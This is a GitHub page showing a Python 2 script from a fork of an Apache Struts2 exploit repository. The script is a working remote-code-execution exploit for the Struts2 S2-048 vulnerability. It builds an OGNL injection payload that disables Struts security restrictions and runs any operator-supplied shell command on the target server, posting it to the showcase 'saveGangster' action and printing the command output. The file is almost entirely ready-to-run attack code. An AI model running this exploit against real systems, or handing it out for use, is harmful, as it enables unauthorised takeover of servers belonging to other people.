forked from piesecurity/apache-struts2-CVE-2017-5638
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathexploitS2-048-cmd.py
executable file
·46 lines (39 loc) · 1.88 KB
/
exploitS2-048-cmd.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import urllib
import urllib2
import httplib
def exploit(host,cmd):
print "[Execute]: " + cmd + "\n"
ognl_payload = "${"
ognl_payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
ognl_payload += "(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
ognl_payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
ognl_payload += "(#ognlUtil.getExcludedPackageNames().clear())."
ognl_payload += "(#ognlUtil.getExcludedClasses().clear())."
ognl_payload += "(#context.setMemberAccess(#dm))))."
ognl_payload += "(#cmd='{}').".format(cmd)
ognl_payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
ognl_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
ognl_payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
ognl_payload += "(#p.redirectErrorStream(true))."
ognl_payload += "(#process=#p.start())."
ognl_payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
ognl_payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
ognl_payload += "(#ros.flush())"
ognl_payload += "}"
if not ":" in host:
host = "{}:8080".format(host)
url = "http://{}/integration/saveGangster.action".format(host)
data = urllib.urlencode({'Name':ognl_payload, 'Age':'1337','__checkbox_bustedBefore':'false','description':'hook is totally 1337'})
try:
request = urllib2.Request(url, data)
response = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
response = e.partial
print response
if len(sys.argv) < 3:
sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])
else:
exploit(sys.argv[1],sys.argv[2])